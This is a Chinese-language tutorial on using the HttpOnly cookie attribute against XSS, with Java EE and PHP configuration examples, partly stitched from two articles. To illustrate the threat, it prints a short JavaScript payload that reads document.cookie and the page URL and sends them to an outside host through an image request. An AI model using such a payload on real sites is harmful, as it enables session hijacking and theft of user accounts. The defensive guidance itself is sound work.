什么是httponly?
如果您在cookie中设置了httponly属性，那么通过js脚本将无法读取到cookie信息，这样能有效的防止xss攻击，具体一点的介绍请google进行搜索
javaee的api是否支持?
目前sun公司还没有公布相关的api，但php、c#均有实现。搞javaee的兄弟们比较郁闷了，别急下文有变通实现
3.httponly的设置样例
javaee response.setheader("set-cookie", "cookiename=value; path=/;domain=domainvalue;max-age=seconds;httponly");
这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是php设置httponly的方法,需要的朋友可以参考下
xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。
如下js获取cookie信息：
代码如下:
url=document.top.location.href; cookie=document.cookie; c=new image(); c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是从document对象中获取的，现在浏览器在设置cookie的时候一般都接受一个叫做httponly的参数，跟domain等其他参数一样，一旦这个httponly被设置，你在浏览器的document对象中就看不到cookie了。
php设置httponly：
//在php.ini中，session.cookie_httponly = ture 来开启全局的cookie的httponly属性 ini_set("session.cookie_httponly", 1); //或者setcookie()的第七个参数设置为true session_set_cookie_params(0, null, null, null, true);
对于php5.1以前版本的php通过：
header("set-cookie: hidden=value; httponly");
最后，httponly不是万能的！
以上就是php利用httponly防xss攻击的详细内容。